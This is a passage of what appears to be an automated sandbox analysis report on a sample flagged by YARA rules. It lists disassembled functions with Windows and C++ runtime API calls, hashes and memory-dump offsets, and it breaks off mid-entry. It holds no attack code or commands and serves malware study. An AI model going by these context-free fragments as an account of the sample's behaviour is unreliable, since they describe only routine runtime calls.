                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 1674182817-0
                                                                                                    • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction ID: 959e3fd44087845d4612e62d204c87a96453019a09bf2d656decf004f64b6446
                                                                                                    • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                    • Instruction Fuzzy Hash: 67F0A7B2A802253EE724B7755C06FBB369C9F01751F500876B915E6085EBB9D4048AB8
                                                                                                    APIs
                                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02111342
                                                                                                      • Part of subcall function 02110BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02110BD6
                                                                                                      • Part of subcall function 02110BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02110BF7
                                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02111355
                                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02111361
                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0211136A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                                    • String ID:
                                                                                                    • API String ID: 4284812201-0
                                                                                                    • Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                    • Instruction ID: 932725224c34c6237a0c12e2290f0b952ef6cfa3f5c8e49ba07bc37693ec4bc2
                                                                                                    • Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
                                                                                                    • Instruction Fuzzy Hash: F4F02431AC0309BF8F287A74085157EB1A76F55324B0400399A219F7C0DF718D419B94
                                                                                                    APIs
                                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0211D088
                                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0211D0AC
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0211D0BF
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0211D0CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                    • String ID:
                                                                                                    • API String ID: 3657713681-0
                                                                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction ID: 3c2ef53e4d15f80762d913e6bd416a63b408a7897dd9f5b1f2f00321f3e70fb5
                                                                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                    • Instruction Fuzzy Hash: CBF09E35A80204ABC728FB54F840C9EB37A8E90B14360867FD80513185EF72E90ACA62
                                                                                                    APIs
                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 00412608
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,004185C9,?,?,?,?,00000000,?,00000000), ref: 00412617
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041262D
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041263B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3803302727-0
                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768
                                                                                                    APIs
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 02105A83
                                                                                                    • __Cnd_signal.LIBCPMT ref: 02105A8F
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 02105AA4
                                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02105AAB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                    • String ID:
                                                                                                    • API String ID: 2059591211-0
                                                                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction ID: c72bdae5138c6cead18495c8db5c6c813bd08cedaba9327d8c9e5fdeaae2a6ea
                                                                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                    • Instruction Fuzzy Hash: 32F0A032480700AFEB317B71E88671A73A2AF00328F14482DE0495A8E0CFFAE8558E55
                                                                                                    APIs
                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0211286F
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,02118830,?,?,?,?,00000000,?,00000000), ref: 0211287E
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112894
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 021128A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3803302727-0
                                                                                                    • Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction ID: 8e049f20c85f9b1eff0c38e06b82d0b628ea5ab1f41e2d097791332cdffb6b6f
                                                                                                    • Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
                                                                                                    • Instruction Fuzzy Hash: F2F03935A4021ABBCF10EFA4CD45EAF37B8AB00B51F600675B915E60E0EB75D6149BA4
                                                                                                    APIs
                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041232C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041235E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 200240550-0
                                                                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
                                                                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC
                                                                                                    APIs
                                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 02112593
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,02110DA0), ref: 021125A1
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021125B7
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 021125C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 200240550-0
                                                                                                    • Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction ID: 9fab49cd3fac452db98d1fb51efde6c22bfb8032678c1e08c4228551450c3485
                                                                                                    • Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
                                                                                                    • Instruction Fuzzy Hash: DCE0DF61A8032A2EE710B7B58C52FBB36AC9B00B41F940871BD14E11C2FBB8E10449B8
                                                                                                    APIs
                                                                                                      • Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
                                                                                                    • GetLastError.KERNEL32 ref: 00423991
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004239B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3735082963-0
                                                                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
                                                                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D
                                                                                                    APIs
                                                                                                      • Part of subcall function 02112959: TlsAlloc.KERNEL32(?,02110DA0), ref: 0211295F
                                                                                                    • TlsAlloc.KERNEL32(?,02110DA0), ref: 02123BE6
                                                                                                    • GetLastError.KERNEL32 ref: 02123BF8
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02123C0E
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02123C1C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3735082963-0
                                                                                                    • Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction ID: db53fb5d90b9f24ea3d369c095675c05d3a5aa76edf2d7b05823f14e2f5d5e94
                                                                                                    • Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
                                                                                                    • Instruction Fuzzy Hash: 23E06834880239AFC314BF759C49A7E72686A013017200E77F935D20A0FB39D01D8EAC
                                                                                                    APIs
                                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041256A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016159387-0
                                                                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
                                                                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C
                                                                                                    APIs
                                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02110DA0), ref: 0211279E
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02110DA0), ref: 021127AD
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021127C3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 021127D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016159387-0
                                                                                                    • Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction ID: 6b8ea5f9342f38b433827c9f315f685bf5b43c443252ee07199e54013dec33f6
                                                                                                    • Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
                                                                                                    • Instruction Fuzzy Hash: 89E08678A4011AABCB04FBB5DD49EAF73BC6E00B05B600575F901E3150EB79D7088BB9
                                                                                                    APIs
                                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                    • GetLastError.KERNEL32 ref: 0041269D
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4286982218-0
                                                                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                    APIs
                                                                                                    • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1964976909-0
                                                                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                    APIs
                                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 021128F8
                                                                                                    • GetLastError.KERNEL32 ref: 02112904
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0211291A
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02112928
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4286982218-0
                                                                                                    • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction ID: fa1418d761b3fd8fa5304716b0343b8f414401c5895348ca7ce560eaab3f097c
                                                                                                    • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                    • Instruction Fuzzy Hash: F7E0863454012D6BCB14BF75CC05BBB376CAB00745B504935BC15D20A4EB39D1148AAC
                                                                                                    APIs
                                                                                                    • TlsSetValue.KERNEL32(?,00000000,02117BD8,00000000,?,?,02110DA0,?,?,?,00000000,?,00000000), ref: 021129BE
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021129CA
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021129E0
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 021129EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1964976909-0
                                                                                                    • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction ID: 8f5f79cf2550ad183512e7a336be9ed28b417a0da3d39aafe082d8bb55eb725d
                                                                                                    • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                    • Instruction Fuzzy Hash: F6E08C3564012DABDB10BF74CC08BBF37ACAF00B45B504935BD19E20A4EB3AD1249BA8
                                                                                                    APIs
                                                                                                    • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                    • GetLastError.KERNEL32 ref: 00412705
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3103352999-0
                                                                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                    APIs
                                                                                                    • TlsAlloc.KERNEL32(?,02110DA0), ref: 0211295F
                                                                                                    • GetLastError.KERNEL32 ref: 0211296C
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112982
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02112990
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3103352999-0
                                                                                                    • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction ID: e0a3258cefba293185e175d5a9551cf62cd976937928418af851a8bf8bcf4e41
                                                                                                    • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                    • Instruction Fuzzy Hash: 67E0C2344401396B8714BBB89C48A7B32A86A01715B600B35F861E20E4EB78D0088AA8
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                    • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                    • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                    • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 0-711371036
                                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0213B32B,?,00000050,?,?,?,?,?), ref: 0213B1AB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 0-711371036
                                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction ID: 7dde5906d8040170255d005df58248a991b4dd6c406ddb0fcc9f8a9d5f8761cc
                                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                    • Instruction Fuzzy Hash: 47218662B98105A6EB26CE54AD01BA773ABEF44B5DF578424E909D7204F732DB00C390
                                                                                                    APIs
                                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
